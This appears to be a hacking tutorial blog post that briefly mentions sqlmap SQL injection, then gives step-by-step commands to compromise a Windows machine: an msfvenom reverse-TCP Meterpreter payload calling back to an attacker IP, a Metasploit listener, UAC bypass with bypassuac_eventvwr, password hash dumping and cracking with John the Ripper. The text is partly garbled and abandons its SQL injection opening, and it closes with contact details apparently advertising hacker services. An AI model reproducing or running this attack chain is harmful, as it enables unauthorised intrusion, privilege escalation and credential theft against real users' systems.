There are many SQL injection tools, but probably the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website.
SQL Injections or SQLi, is where arbitrary code is injected into a website via its URL to force the database to reveal information.
A simple SQLi possible URL could be, (url)/index.php?id=1 and to test if it is vulnerable just add a simple ’ to the end of the URL.
Illegal way to access someone’s computer that’s call system hacking a hacker hack the system using the malware, payload, and virus, Some hacking types are perfectly legal, One of the most important methods used by hackers in order to circumvent the standard authentication is password cracking.
It is actually the very first step in the system hacking process. a hacker needs to physically access the target system and inject the payload target system. Let’s try some example
Windows System Hacking
First we create a payload using the metasploit framework simple run the command. payload is the part of transmitted data that is the actual intended message.
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.103 lport=4545 -f exe > hackNos.exe
Parameter uses
- -p Payload to use
- lhost Attacker IP address
- lport Attacker listing port
- -f Output formate
- > Payload output filename

and we start our Metasploit payload listener and load the module multi handler
msfdb run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.20.10.4
set lport 4545
run

our TCP handler is start now we start any server I use python SimpleHTTPServer for transferring our payload target system.
python -m SimpleHTTPServer 80
open any browser and download the payload target system

our download is complete now click the open button and execute the payload

Now we have meterpreter shell target machine run the sysinfo command it’s output show about system information.
sysinfo

we move on our next step dump all hashes but first, we migrate our payload with another running process ps command is show all running process target machine
ps
migrate 4040
and run the getsystem command for administrator account access and we face a error priv_elevate_system we have now permission for administrator account access we can bypass the error using the post exploitation moudule
get system
background

Post exploitation
run the session in background and load the module bypassuac_eventvwr and set the session name
use exploit/windows/local/bypassuac_eventvwr
set session 1
run
and new meterpreter session is open again run the getsystem command our command is run successfully
getsystem
hashdum

Window hash Cracking
save the hash in a file and using the john tool we can crack the hash –word lists choose your word-lists path
cat hash.txt
john --wordlists=/usr/share/wordlists/rockyou.txt --format=NT hash.txt

THIS ARTICLE IS STRICTLY FOR EDUCATIONAL PURPOSE AND NOT MEANT TP SUPPORT OR PROMOTE ANY ILLEGAL ACTIVITY.
for more information contact or go on www.alienmanhackers.xyz
TELEGRAM: ALIENM4NHACKERS
CALL OR TEXT: +13603603875
SIGNAL : +16469229088